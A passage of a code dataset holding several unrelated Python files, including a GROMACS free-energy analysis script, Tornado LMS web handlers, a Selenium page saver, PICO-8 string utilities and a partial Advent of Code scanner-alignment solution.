extract_dHdl\nfrom alchemlyb.preprocessing.subsampling import equilibrium_detection\nfrom alchemlyb.estimators import TI, BAR, MBAR\n\ndef initialize(args):\n parser = argparse.ArgumentParser(\n description='This code performs free energy calculations given dhdl file(s) from GROMACS.')\n parser.add_argument('-d',\n '--dir',\n type=str,\n default='.',\n help='The directory where the dhdl files are.')\n parser.add_argument('-T',\n '--temp',\n type=float,\n default=298.15,\n help='The simulation temperature in Kelvin.')\n parser.add_argument('-b',\n '--bounds',\n nargs='+',\n default=[None, None],\n help='The lower and upper bounds (in ps) for truncating the data.')\n parser.add_argument('-n',\n '--n_replicas',\n type=int,\n required=True,\n help='The number of replicas. A number of 1 assumes expanded ensemble.')\n parser.add_argument('-s',\n '--spacing',\n type=int,\n default=1,\n help='The number of steps between samples to used in the timeseries.')\n\n args_parse = parser.parse_args(args)\n\n return args_parse \n\ndef preprocess_data(folders, temp, spacing, bounds=[None, None]):\n \"\"\"\n Preprocesses data with the following steps:\n - For each state, extract the dHdl and u_nk data from the *dhdl.xvg files and concatenate them\n - Truncate the equilibrium region and subsample the dataset with the statistical inefficiency\n - Concatenate dHdl/u_nk data of all replicas\n\n Parameters\n ----------\n folders : list\n A list of folders where the dhdl files reside.\n temp : float\n The simulation temperature in Kelvin.\n bounds : list\n The lower and uppor bounds for truncating the data\n\n Returns\n -------\n dHdl_data : pd.Dataframe\n The preprocessed dHdl data that can serve as the input to free energy estimators.\n u_nk_data : pd.Dataframe\n The preprocessed u_nk data that can serve as the input to free energy estimators.\n \"\"\"\n dHdl_data, u_nk_data = [], []\n for i in range(len(folders)):\n if len(folders) > 1:\n logger(f'\\nData preprocessing for state {i}')\n files = glob.glob(os.path.join(folders[i], '*dhdl*xvg*'))\n files = natsort.natsorted(files, reverse=False)\n\n print(f' Collecting data for the following files: {\", \".join(files)}')\n print(' Subsampling the dHdl and u_nk data ...')\n dHdl = alchemlyb.concat([extract_dHdl(xvg, T=temp) for xvg in files])\n dHdl_series = subsampling.dhdl2series(dHdl)\n dHdl, dHdl_series = subsampling._prepare_input(dHdl, dHdl_series, drop_duplicates=True, sort=True)\n dHdl = subsampling.slicing(dHdl, lower=bounds[0], upper=bounds[1], step=spacing)\n dHdl_series = subsampling.slicing(dHdl_series, lower=bounds[0], upper=bounds[1], step=spacing)\n t, statinef, Neff_max = detect_equilibration(dHdl_series.values)\n print(f' Adopted spacing: {spacing: .0f}')\n print(f' {t / len(dHdl_series) * 100: .1f}% of the dHdl data was in the equilibrium region and therfore discarded.')\n print(f' Statistical inefficiency of dHdl: {statinef: .1f}')\n print(f' Number of effective samples: {Neff_max}')\n dHdl_series_equil, dHdl_equil = dHdl_series[t:], dHdl[t:]\n indices = subsample_correlated_data(dHdl_series_equil, g=statinef)\n preprocessed_dHdl = dHdl_equil.iloc[indices]\n\n u_nk = alchemlyb.concat([extract_u_nk(xvg, T=temp) for xvg in files])\n u_nk_series = subsampling.u_nk2series(u_nk)\n u_nk, u_nk_series = subsampling._prepare_input(u_nk, u_nk_series, drop_duplicates=True, sort=True)\n u_nk = subsampling.slicing(u_nk, lower=bounds[0], upper=bounds[1], step=spacing)\n u_nk_series = subsampling.slicing(u_nk_series, lower=bounds[0], upper=bounds[1], step=spacing)\n t, statinef, Neff_max = detect_equilibration(u_nk_series.values)\n print(f' Adopted spacing: {spacing: .0f}')\n print(f' {t / len(u_nk_series) * 100: .1f}% of the dHdl data was in the equilibrium region and therfore discarded.')\n print(f' Statistical inefficiency of dHdl: {statinef: .1f}')\n print(f' Number of effective samples: {Neff_max}')\n u_nk_series_equil, u_nk_equil = u_nk_series[t:], u_nk[t:]\n indices = subsample_correlated_data(u_nk_series_equil, g=statinef)\n preprocessed_u_nk = u_nk_equil.iloc[indices]\n\n dHdl_data.append(preprocessed_dHdl)\n u_nk_data.append(preprocessed_u_nk)\n \n # Finally, concatenate dHdl/u_nk data from different replicas as needed\n dHdl_data = alchemlyb.concat(dHdl_data)\n u_nk_data = alchemlyb.concat(u_nk_data)\n\n logger('Pickling the preprocessed dHdl/u_nk data ...')\n with open('dHdl_u_nk_data.pickle', 'wb') as handle:\n pickle.dump([dHdl, u_nk], handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n return dHdl_data, u_nk_data\n\ndef free_energy_calculation(dHdl, u_nk):\n logger('Fitting TI on dHdl ...')\n ti = TI().fit(dHdl)\n\n logger('Fitting BAR on u_nk ...')\n bar = BAR().fit(u_nk)\n\n logger('Fitting MBAR on u_nk ...\\n')\n try:\n mbar_stop = False\n mbar = MBAR().fit(u_nk)\n except pymbar.utils.ParameterError():\n mbar_stop = True\n logger(\"\\sum_n W_nk is not equal to 1, probably due to insufficient overlap between states.\")\n logger(\"Stop using MBAR ...\")\n\n logger(\"------ Results based on the whole dataset ------\")\n logger(f\"TI: {ti.delta_f_.iloc[0, -1]:.4f} +/- {ti.d_delta_f_.iloc[0, -1]:.4f} kT\")\n logger(f\"BAR: {bar.delta_f_.iloc[0, -1]:.4f} +/- unknown kT\")\n\n if mbar_stop is False:\n logger(f\"MBAR: {mbar.delta_f_.iloc[0, -1]:.4f} +/- {mbar.d_delta_f_.iloc[0, -1]:.4f} kT\")\n logger(\"------------------------------------------------\")\n return ti, bar, mbar\n else:\n logger(\"------------------------------------------------\")\n return ti, bar\n\ndef get_overlap_matrix(u_nk):\n # sort by state so that rows from same state are in contiguous blocks\n u_nk = u_nk.sort_index(level=u_nk.index.names[1:])\n\n groups = u_nk.groupby(level=u_nk.index.names[1:])\n N_k = [(len(groups.get_group(i)) if i in groups.groups else 0) for i in u_nk.columns] \n\n MBAR = pymbar.mbar.MBAR(u_nk.T, N_k)\n overlap_matrix = np.array(MBAR.compute_overlap()['matrix'])\n\n return overlap_matrix\n\ndef plot_matrix(matrix, png_name, start_idx=0):\n sns.set_context(rc={\n 'family': 'sans-serif',\n 'sans-serif': ['DejaVu Sans'],\n 'size': 5\n })\n\n K = len(matrix)\n plt.figure(figsize=(K / 3, K / 3))\n annot_matrix = np.zeros([K, K]) # matrix for annotating values\n\n mask = []\n for i in range(K):\n mask.append([])\n for j in range(len(matrix[0])):\n if matrix[i][j] < 0.005: \n mask[-1].append(True)\n else:\n mask[-1].append(False)\n\n for i in range(K):\n for j in range(K):\n annot_matrix[i, j] = round(matrix[i, j], 2)\n\n x_tick_labels = y_tick_labels = np.arange(start_idx, start_idx + K)\n ax = sns.heatmap(matrix, cmap=\"YlGnBu\", linecolor='silver', linewidth=0.25,\n annot=annot_matrix, square=True, mask=matrix<0.005, fmt='.2f', cbar=False, xticklabels=x_tick_labels, yticklabels=y_tick_labels)\n ax.xaxis.tick_top()\n ax.tick_params(length=0)\n cmap = cm.get_cmap('YlGnBu') # to get the facecolor\n ax.set_facecolor(cmap(0)) # use the brightest color (value = 0)\n for _, spine in ax.spines.items():\n spine.set_visible(True) # add frames to the heat map\n plt.annotate('$\\lambda$', xy=(0, 0), xytext=(-0.45, -0.20))\n plt.title('Overlap matrix', fontsize=10, weight='bold')\n plt.tight_layout(pad=1.0)\n\n plt.savefig(png_name, dpi=600)\n #plt.show()\n plt.close()\n\ndef logger(*args, **kwargs):\n print(*args, **kwargs)\n with open(\"result.txt\", \"a\") as f:\n print(file=f, *args, **kwargs)\n\ndef main():\n # Suppress pandas FutureWarning\n warnings.simplefilter(action='ignore', category=FutureWarning)\n\n rc('font', **{\n 'family': 'sans-serif',\n 'sans-serif': ['DejaVu Sans'],\n 'size': 6\n })\n # Set the font used for MathJax - more on this later\n rc('mathtext', **{'default': 'regular'})\n plt.rc('font', family='serif')\n\n t1 = time.time()\n args = initialize(sys.argv[1:])\n\n logger(f'Commandline: {\" \".join(sys.argv)}')\n\n if os.path.isfile('dHdl_u_nk_data.pickle') is True:\n logger('Loading the preprocessed data dHdl and u_nk ...')\n with open('dHdl_u_nk_data.pickle', 'rb') as handle:\n data = pickle.load(handle)\n dHdl, u_nk = data[0], data[1]\n else:\n if args.n_replicas == 1:\n folders = [args.dir]\n else:\n folders = [f'{args.dir}/state_{i}' for i in range(args.n_replicas)]\n dHdl, u_nk = preprocess_data(folders, args.temp, args.spacing, args.bounds)\n\n logger('\\nPerforming free energy calculations on the whole dataset ...')\n output = free_energy_calculation(dHdl, u_nk)\n\n logger(\"\\nComputing and visualizing the overlap matrix ...\")\n matrix = get_overlap_matrix(u_nk)\n plot_matrix(matrix, 'overlap_matrix.png')\n t2 = time.time()\n logger(f\"Time elapsed: {t2 - t1:.0f} seconds.\")\n","repo_name":"wehs7661/REMD_analysis","sub_path":"REMD_analysis/calculate_free_energy.py","file_name":"calculate_free_energy.py","file_ext":"py","file_size_in_byte":10097,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"66"} +{"seq_id":"71090510612","text":"# pylint: disable=abstract-method\n# pylint: disable=arguments-differ\n# pylint: disable=attribute-defined-outside-init\n\nimport json\nfrom typing import Optional, Any\n\nimport tornado.escape\nimport tornado.web\n\nfrom tornado.web import (\n RequestHandler,\n authenticated,\n)\n\n\nclass PingHandler(RequestHandler):\n _response = {\n 'status': 'ok',\n }\n\n def get(self):\n self.write(self._response)\n self.set_status(200)\n self.finish()\n\n\nclass BaseHandler(RequestHandler):\n def write_error(self, status_code: int, **kwargs: Any) -> None:\n self.finish({\n 'code': status_code,\n 'msg': self._reason,\n })\n\n\nclass NotFoundHandler(BaseHandler):\n def prepare(self):\n raise tornado.web.HTTPError(\n status_code=404,\n reason=\"Invalid resource path.\"\n )\n\n\nclass UserHandler(BaseHandler):\n def initialize(self, user_factory):\n self.user_factory = user_factory\n self.body = dict()\n self.msg = None\n if self.request.body:\n try:\n self.body = tornado.escape.json_decode(self.request.body)\n except json.decoder.JSONDecodeError as exception:\n self.msg = f'could not parse body:\\n{str(exception)}'\n\n async def prepare(self): # pylint: disable=invalid-overridden-method\n if self.msg:\n self._bad_request(\n status=400,\n msg=self.msg,\n )\n\n def get_current_user(self) -> Optional[bytes]:\n return self.get_secure_cookie('user_id')\n\n def get_current_user_id(self) -> Optional[int]:\n user_id = self.get_current_user()\n if user_id:\n return int(user_id)\n return None\n\n def _bad_request(self, status=400, *, msg):\n self.set_status(status)\n self.write({\n 'status': 'err',\n 'msg': msg\n })\n self.finish()\n\n\nclass GetUserIdHandler(UserHandler):\n def get(self):\n user_id = self.get_current_user()\n if user_id:\n user_id = user_id.decode('utf-8')\n self.write({\n 'user_id': user_id\n })\n\n\nclass LoginHandler(UserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory=user_factory)\n self.email = self.body.get('email')\n self.password = self.body.get('password')\n\n def get(self):\n self.write({\n 'status': 'err',\n 'msg': 'use POST to login'\n })\n self.finish()\n\n async def post(self):\n user_id = await self.user_factory.login_user(email=self.email, password=self.password)\n if user_id:\n self.set_secure_cookie(\"user_id\", str(user_id))\n self.write({\n 'status': 'ok',\n 'msg': 'successfully logged in, set cookies in header',\n })\n else:\n self._bad_request(\n status=401,\n msg='incorrect email or password or user has not been registered'\n )\n\n\nclass ChangePasswordHandler(UserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory=user_factory)\n self.email = self.body.get('email')\n self.password = self.body.get('password')\n self.new_password = self.body.get('new_password')\n\n def get(self):\n self.write({\n 'status': 'err',\n 'msg': 'use POST'\n })\n self.finish()\n\n async def post(self):\n user_id = await self.user_factory.login_user(email=self.email, password=self.password)\n if not user_id:\n self._bad_request(\n status=401,\n msg='incorrect email or password or user has not been registered'\n )\n return\n user = await self.user_factory.get_student_or_professor(user_id=user_id, authenticated=True)\n update_result = await user.update_email_password(\n user_id=user_id,\n password=self.new_password,\n email=self.email\n )\n if update_result:\n self.write({\n 'status': 'ok',\n 'updated': True,\n 'msg': f'successfully changed password for user_id = {user_id}',\n })\n else:\n self.write({\n 'status': 'err',\n 'updated': False,\n 'msg': update_result.msg,\n })\n\n\nclass RegisterHandler(UserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory=user_factory)\n self.verification_code = self.body.get('verification_code')\n self.email = self.body.get('email')\n self.password = self.body.get('password')\n\n async def post(self):\n success, msg = await self.user_factory.register_user(\n verification_code=self.verification_code,\n email=self.email,\n password=self.password\n )\n if not success:\n self._bad_request(status=401, msg=msg)\n else:\n self.write({\n 'status': 'ok',\n 'msg': msg,\n })\n\n\nclass AuthUserHandler(UserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory=user_factory)\n\n async def prepare(self):\n await super().prepare()\n self.user_id = self.get_current_user_id()\n if self.user_id is None:\n raise tornado.web.HTTPError(403)\n self.user = await self.user_factory.get_student_or_professor(\n user_id=self.user_id\n )\n\n\nclass UserInfoHandler(UserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory)\n self.user_id = self.get_current_user_id()\n self.authenticated = self.user_id is not None\n if self.get_argument('user_id', default=None):\n self.user_id = self.get_argument('user_id')\n if self.user_id:\n self.user_id = int(self.user_id)\n self.authenticated &= self.user_id == self.get_current_user_id()\n\n async def prepare(self):\n await super().prepare()\n if self.user_id is not None:\n self.user = await self.user_factory.get_student_or_professor(\n user_id=self.user_id,\n authenticated=self.authenticated\n )\n\n def _doesnt_exist(self):\n self._bad_request(\n status=400,\n msg=f\"user_id {self.user_id} does not exist\"\n )\n\n async def get(self):\n if not self.user_id:\n self._bad_request(msg='expected authentication or user_id within GET argument')\n assert False\n info = await self.user.get_info()\n if not info:\n self._doesnt_exist()\n return\n self.write({\n 'status': 'ok',\n 'info': info,\n })\n\n @authenticated\n async def post(self):\n if self.user_id != self.get_current_user_id():\n self._bad_request(\n msg='could not perform update for other user, please verify user_id GET argument'\n )\n return\n to_update = self.body.get('update')\n if to_update is None:\n self._bad_request(\n msg='expected \"update\" property in body; POST request is used to modify user_info'\n )\n return\n update_result = await self.user.update_info(update=to_update)\n if update_result.success:\n self.write({\n 'status': 'ok',\n 'updated': True,\n 'msg': f'successfully update info for user_id = {self.user_id}',\n })\n else:\n self.write({\n 'status': 'err',\n 'updated': False,\n 'msg': update_result.msg,\n })\n\n\nclass UserClassmatesHandler(AuthUserHandler):\n _CLASSMATE_FIELDS = ('user_id', 'name')\n\n async def prepare(self):\n await super().prepare()\n if await self.user.is_professor:\n self._bad_request(status=405, msg='method classmates is not allowed for professor')\n return\n self.classmates = await self.user.classmates()\n\n async def get(self):\n classmates = []\n for classmate in self.classmates:\n classmates.append(\n await classmate.get_info(properties=self._CLASSMATE_FIELDS)\n )\n self.write({\n 'status': 'ok',\n 'classmates': classmates,\n })\n\n\nclass UserCoursesHandler(AuthUserHandler):\n _COURSES_FIELDS = ('course_id', 'name')\n\n async def prepare(self):\n await super().prepare()\n self.courses = await self.user.courses()\n\n async def get(self):\n courses = [\n await course.get_info(properties=self._COURSES_FIELDS)\n for course in self.courses\n ]\n self.write({\n 'status': 'ok',\n 'courses': courses,\n })\n\n\nclass EditUserInfoHandler(AuthUserHandler):\n def initialize(self, user_factory):\n super().initialize(user_factory)\n self.update = self.body.get('update')\n\n async def prepare(self):\n await super().prepare()\n if not self.update:\n self._bad_request(msg='expected \"update\" parameter')\n for param in self.update:\n if param not in self.user.EDITABLE_PARAMS:\n self._bad_request(\n msg=f'unexpected field {param} does not exist or cannot be updated'\n )\n\n\nclass BaseCourseHandler(AuthUserHandler):\n def initialize(self, user_factory, course_class):\n super().initialize(user_factory)\n course_id = self.get_argument('course_id', default=None)\n if course_id:\n course_id = int(course_id)\n self.course = course_class(course_id=course_id)\n\n async def prepare(self):\n await super().prepare()\n if not self.course.course_id:\n self._bad_request(\n msg='expected course_id GET parameter'\n )\n return\n\n\nclass CourseInfoHandler(BaseCourseHandler):\n async def get(self):\n info = await self.course.get_info()\n if not info:\n self._bad_request(\n msg=f'course_id = {self.course.course_id} not found in courses'\n )\n return\n self.write({\n 'status': 'ok',\n 'info': info,\n })\n\n\nclass BaseCourseAssigneeHandler(BaseCourseHandler):\n def initialize(self, user_factory, course_class):\n super().initialize(user_factory=user_factory, course_class=course_class)\n self.assignee_name = self.get_argument('assignee_name', None)\n\n async def prepare(self):\n await super().prepare()\n if not self.assignee_name:\n self._bad_request(\n msg='expected assignee_name GET parameter'\n )\n return\n\n\nclass BaseAssigneeHandler(AuthUserHandler):\n def initialize(self, user_factory, course_class):\n super().initialize(user_factory=user_factory)\n self.course_class = course_class\n self.assignee_name = self.get_argument('assignee_name', None)\n self.course = None\n\n async def prepare(self):\n await super().prepare()\n if not self.assignee_name:\n self._bad_request(\n msg='expected assignee_name GET parameter'\n )\n return\n self.course = await self.course_class.resolve_assignee_course(assignee_name=self.assignee_name)\n if not self.course:\n self._bad_request(\n msg='assignee_name not found',\n )\n return\n\n\nclass AssigneeSubmitHandler(BaseAssigneeHandler):\n async def post(self):\n if await self.user.is_professor:\n self._bad_request(\n msg='only student can submit assignee',\n )\n return\n if not await self.course.check_assigned(user_id=self.user_id):\n self._bad_request(\n msg=f'user_id={self.user_id} is not assigned to course_id={course.course_id}'\n )\n return\n solution = self.body.get('solution', None)\n if not solution:\n self._bad_request(\n msg='expected non empty \"solution\" field in body',\n )\n return\n submission = await self.course.submit_assignee(\n assignee_name=self.assignee_name,\n solution=solution,\n student_id=self.user_id\n )\n if not submission['success']:\n self._bad_request(\n msg=submission['msg']\n )\n return\n self.write({\n 'status': 'ok',\n 'result': submission['result'],\n })\n\n\nclass AssigneesViewerHandler(BaseAssigneeHandler):\n async def get(self):\n if not self.assignee_name:\n self._bad_request(\n msg=f'GET parameter assignee_name not found'\n )\n return\n if not await self.user.is_professor:\n self._bad_request(\n msg=f'user_id {self.user_id} is not professor, forbidden'\n )\n return\n result = await self.course.get_assignees_grouped(assignee_name=self.assignee_name)\n self.write({\n 'status': 'ok',\n 'assignees': result,\n })\n","repo_name":"ulyanin/LMS","sub_path":"lms/web/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":13321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"23451314081","text":"#!/usr/bin/env python\n# _*_ coding: UTF-8 _*_\n# Author:taoke\nfrom selenium import webdriver\ndriver = webdriver.Chrome()\ndriver.implicitly_wait(10)\ndriver.get('http://wenshu.court.gov.cn/content/content?DocID=f05b8b81-b647-11e3-84e9-5cf3fc0c2c18')\nelement = driver.find_element_by_id('Content')\n\ntext = driver.find_element_by_xpath(\"//*\").get_attribute(\"outerHTML\")\nwith open('1.txt','w',encoding='utf-8') as file:\n file.write(text)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"1052687889/webCrawler","sub_path":"文案网/wenan.py","file_name":"wenan.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"70471061332","text":"# pylint:disable = multiple-imports\nimport builtins, os, sys\n\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\nfrom pypico8.math import flr\nfrom pypico8.table import Table\n\n\nBTN_X = \"❎\"\nBTN_O = \"🅾️\"\nBTN_LEFT = \"⬅️\"\nBTN_RIGHT = \"➡️\"\nBTN_UP = \"⬆️\"\nBTN_DOWN = \"⬇️\"\nPROBLEMATIC_MULTI_CHAR_CHARS = (BTN_O, BTN_X, BTN_LEFT, BTN_RIGHT, BTN_UP, BTN_DOWN)\n\n\ndef printh(s, filename=None, overwrite=False, save_to_desktop=False):\n \"\"\"\n >>> filename = \"pico8_printh_test.txt\"\n >>> printh('pico8 printh test', filename, overwrite=True, save_to_desktop=True)\n >>> open(os.path.join(os.environ[\"HOMEPATH\"], \"Desktop\", os.path.split(filename)[1])).read()\n 'pico8 printh test'\n \"\"\"\n if save_to_desktop:\n filename = os.path.join(\n os.environ[\"HOMEPATH\"], \"Desktop\", os.path.split(filename)[1]\n )\n if filename:\n with open(filename, \"w\" if overwrite else \"a\") as fp:\n fp.write(s)\n else:\n builtins.print(s)\n\n\ndef pico8_to_python(s):\n r\"\"\"Hackily translates PICO-8 to Python.\n >>> pico8_to_python('for i=0,30 do ?\"웃\"')\n 'def _init():\\n global \\nfor i in range(0, 30+1): print(\"웃\")\\nrun(_init, _update, _draw)'\n \"\"\"\n import re # noqa\n\n s = s.replace(\"local\", \"\")\n s = re.sub(r\"#([a-zA-Z0-9]+)\", r\"len(\\1)\", s)\n # Lua table\n s = s.replace(\"{[0]=\", \"([\").replace(\"}\", \"])\") # 0-based\n s = s.replace(\"{\", \"Table([\") # 1-based\n # logic\n s = re.sub(r\"\\s*then\", \":\", s)\n s = s.replace(\"elseif\", \"elif\")\n s = s.replace(\"else\", \"else:\")\n s = re.sub(\n r\"function\\b\\s*([^)]+)\\)\", r\"def \\1):\\n \", s\n ) # Note: Extra parameters are default None.\n s = s.replace(\"end\", \"# }\")\n # operators\n s = s.replace(\"...\", \"*argv\")\n s = s.replace(\"..\", \"+\")\n s = s.replace(\"^\", \"**\")\n s = s.replace(\"\\\\\", \"//\")\n s = re.sub(r\"//\\s*1\\b\", \"#int()\", s)\n s = s.replace(\"~=\", \"!=\")\n s = re.sub(r\",%([a-zA-Z0-9]+)\", r\",peek2(\\1)\", s)\n # comments\n s = re.sub(r\"--\\[\\[(.*?)\\]\\]\", r\"'''\\1'''\", s, flags=re.DOTALL)\n s = re.sub(r\"\\[\\[(.*?)\\]\\]\", r'\"\"\"\\1\"\"\"', s, flags=re.DOTALL)\n s = s.replace(\"--\", \"#\")\n # loops, whose variable is local to the loop (TODO). https://www.lexaloffle.com/bbs/?pid=51130#p\n s = re.sub(r\"([0-9)\\] ])\\s*do\\b\", r\"\\1:\", s)\n s = re.sub(\n r\"for (.*?)=(.+?),(.+?),(.+?):\",\n r\"\\1 = \\2\\nwhile \\1 <= \\3:\\n \\1 += \\4 # TODO, move to end of loop\\n\",\n s,\n )\n s = re.sub(\n r\"for (.*?)=([^,]+),(.*?):\",\n r\"for \\1 in range(\\2, \\3+1):\",\n s,\n )\n # print\n s = (\n s.replace(BTN_X, \"P0_X\")\n .replace(BTN_O, \"P0_O\")\n .replace(BTN_LEFT, \"P0_LEFT\")\n .replace(BTN_RIGHT, \"P0_RIGHT\")\n .replace(BTN_UP, \"P0_UP\")\n .replace(BTN_DOWN, \"P0_DOWN\")\n )\n s = re.sub(r\"print\\(?(\\b[^\\)]+?)\\)?\", r\"print(\\1)\", s)\n s = re.sub(r\"\\?\\s*(.*)\", r\"print(\\1)\", s)\n\n s = re.sub(r\"\\bdel\\b\", \"delete\", s)\n # separate statements\n s = re.sub(r\"([\\])])([a-zA-Z])\", r\"\\1\\n\\2\", s)\n # hooks\n s = \"def _init():\\n global \\n\" + s\n s = re.sub(r\"\\n{3,}\", r\"\\n\\n\", s)\n s = s.replace(\"::_::\", \"\\n\\n\\ndef _update(): pass\\n\\n\\ndef _draw():\\n global \\n\")\n s = s.replace(\"goto _\", \"return\")\n s = s.replace(\"def update():\\n\", \"def update():\\n global \")\n if \"_update60\" in s:\n s += \"\\nrun(_init, _update60, _draw)\"\n else:\n s += \"\\nrun(_init, _update, _draw)\"\n return s\n\n\ndef tostr(val, use_hex=False):\n if use_hex:\n return hex(val)\n return str(val)\n\n\ndef tonum(s):\n \"\"\"Converts a string representation of a decimal, hexadecimal, or binary number to a number value or None.\"\"\"\n if type(s) in (int, float):\n return s\n\n if s is None:\n return 0\n\n base = 10\n if isinstance(s, str):\n if \"x\" in s:\n base = 16\n elif \"b\" in s:\n base = 2\n\n try:\n return int(s, base)\n except ValueError:\n return 0\n\n\ndef chr(index): # noqa\n return builtins.chr(flr(tonum(index) % 256))\n\n\ndef ord(s, index=1): # noqa\n \"\"\"\n >>> ord(\"@\")\n 64\n >>> ord(\"123\", 2) # returns 50 (the second character: \"2\")\n 50\n \"\"\"\n c = s[index - 1]\n return builtins.ord(c)\n\n\ndef sub(s, pos0, pos1=None):\n \"\"\"\n Grab a substring from string str, from pos0 up to and including pos1.\n When pos1 is not specified, the remainer of the string is returned.\n\n >>> s = \"the quick brown fox\"\n >>> sub(s, 5, 9)\n 'quick'\n >>> sub(s, -2.1, -.1)\n 'fox'\n >>> sub(s, -2.1, -2)\n 'fo'\n \"\"\"\n pos0 = flr(pos0) - (1 if pos0 >= 1 else 0)\n if pos1 is not None:\n pos1 = flr(pos1)\n if pos1 < 0:\n pos1 += 1\n if pos1 >= 0:\n pos1 = None\n return s[pos0 : pos1]\n\n\ndef split(s, separator=\",\", convert_numbers=True):\n \"\"\"\n Split a string into a table of elements delimited by the given separator (defaults to \",\").\n When convert_numbers is true, numerical tokens are stored as numbers (defaults to true).\n Empty elements are stored as empty strings.\n When the separator is \"\", every character is split into a separate element.\n\n >>> split(\"1,2,3\")\n {1: 1, 2: 2, 3: 3}\n >>> split(\"one:two:3\",\":\",False)\n {1: 'one', 2: 'two', 3: '3'}\n >>> split(\"1,,2,\")\n {1: 1, 2: '', 3: 2, 4: ''}\n \"\"\"\n result = []\n items = s.split(separator)\n for item in items:\n if convert_numbers:\n try:\n if item == \"\":\n result.append(\"\")\n else:\n result.append(tonum(item))\n except ValueError:\n result.append(item)\n else:\n result.append(item)\n return Table(result)","repo_name":"CTimmerman/PyPico8","sub_path":"src/pypico8/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":5751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15694142326","text":"import utils\nimport time\nimport copy\nimport math\nimport re\nimport heapq\nimport numpy as np\nimport os\nfrom collections import Counter\nfrom os import path\n\nday = 19\n\nfilename=\"input\"+str(day)+\".txt\"\n# filename=\"testinput\"+str(day)+\".txt\"\n\nbasepath = path.dirname(__file__)\nfilepath = path.abspath(path.join(basepath, filename))\n\ninput = []\n\nwith open(filepath) as f:\n input = [l.strip() for l in f.readlines()] # One entry for each line\n \n # input = [x for x in input]\n # input = [int(x) for x in input[0].split(',')]\n # input = [int(x.strip()) for x in input]\n # input = [x.strip() for x in input]\n # input = [[int(s) for s in x] for x in input]\n \nclass Beacon:\n def __init__(self, x, y, z):\n self.x = x\n self.y = y\n self.z = z\n self.d_sqs = []\n \n def __str__(self):\n return \"(%d, %d, %d)\"%(self.x, self.y, self.z)\n \n def d_squared_to(self, other):\n return (self.x - other.x)**2 + (self.y - other.y)**2 + (self.z - other.z)**2\n \n def shared_distances(self, other):\n c = list((Counter(self.d_sqs) & Counter(other.d_sqs)).elements())\n # print(c)\n # if len(c)>10:\n # print(c)\n return len(c)\n \n def array_value(self):\n return np.array([self.x,self.y,self.z])\n \n def get_vector_to(self, other):\n return [other.x - self.x, other.y - self.y, other.z - self.z]\n \n def get_relative_vecs(self, peers):\n return [self.get_vector_to(p) for p in peers]\n \n def rotate(self, transpose_matrix):\n new_a = self.array_value() @ transpose_matrix\n self.x = new_a[0]\n self.y = new_a[1]\n self.z = new_a[2]\n \n def translate(self, translation_vector):\n new_a = self.array_value() + translation_vector\n self.x = new_a[0]\n self.y = new_a[1]\n self.z = new_a[2] \n \n # def __sub__(self, other):\n \n \ndef all_rotations():\n i = np.array([[1, 0, 0],[0, 1, 0],[0, 0, 1]])\n \n roll = np.array([[1, 0, 0],[0, 0, 1],[0, -1, 0]]) # roll top to face away from you - rolls around x-axis\n turn = np.array([[0, 0, 1],[0, 1, 0],[-1, 0, 0]]) # Turn anti-clockwise - turn around y-axis\n \n transforms = []\n \n last = i\n # transforms.append(last)\n for r in range(3):\n for t in range(3):\n last = last @ turn\n transforms.append(last)\n last = last @ roll\n transforms.append(last)\n \n last = last @ roll @ turn @ roll\n \n\n for r in range(3):\n for t in range(3):\n last = last @ turn\n transforms.append(last)\n last = last @ roll\n transforms.append(last)\n \n return transforms\n # Add initial\n # Turn 3 times\n # Roll\n # Turn 3 times\n \n\nclass Scanner:\n def __init__(self, num):\n self.num = num\n self.beacons = []\n self.location = np.array([0,0,0])\n \n def __str__(self):\n return (\"Beacon %d (%s): [%s]\"%(self.num, self.location, \", \".join([s.__str__() for s in self.beacons])))\n \n def __repr__(self):\n return self.__str__()\n \n def calc_distances(self): \n # print(len(self.beacons))\n for i in range(len(self.beacons)-1):\n bi = self.beacons[i]\n for j in range(i+1, len(self.beacons)):\n bj = self.beacons[j]\n d_sq = bi.d_squared_to(bj)\n bi.d_sqs.append(d_sq)\n bj.d_sqs.append(d_sq)\n \n def rotate(self, transpose_matrix):\n for b in self.beacons:\n b.rotate(transpose_matrix)\n \n def translate(self, translation_vector):\n for b in self.beacons:\n b.translate(translation_vector)\n self.location = translation_vector\n \n def manhattan_distance_to(self, other):\n # print(other.location, self.location)\n diff = other.location - self.location\n dist = sum([abs(x) for x in diff])\n # print(dist)\n return dist\n \n \n def align_other_to_self(self, other):\n # This beacon overlaps with another if 12 of the Beacons are the same\n my_matching_beacons = []\n their_matching_beacons = []\n # To find this, check if any single beacon in my list has 12 overlapping d_sqs with any beacon in their list\n for mybeacon in self.beacons:\n for theirbeacon in other.beacons:\n # print(\"Checking: \", mybeacon, theirbeacon)\n x = mybeacon.shared_distances(theirbeacon)\n if x > 10:\n # print(\"Found one!!\", x, mybeacon, theirbeacon)\n my_matching_beacons.append(mybeacon)\n # my_matching_beacons = np.concatenate((my_matching_beacons, np.array()))\n their_matching_beacons.append(theirbeacon)\n if len(my_matching_beacons) > 10:\n my_vecs = my_matching_beacons[0].get_relative_vecs(my_matching_beacons[1:])\n their_vecs = their_matching_beacons[0].get_relative_vecs(their_matching_beacons[1:])\n \n my_a = np.array(my_vecs)\n their_a = np.array(their_vecs)\n\n ts = all_rotations()\n \n for t in ts:\n check = their_a @ t\n # print(check)\n if np.array_equal(my_a, check):\n # print(\"wtf\", check, t)\n break\n # print(t)\n \n my_b0 = 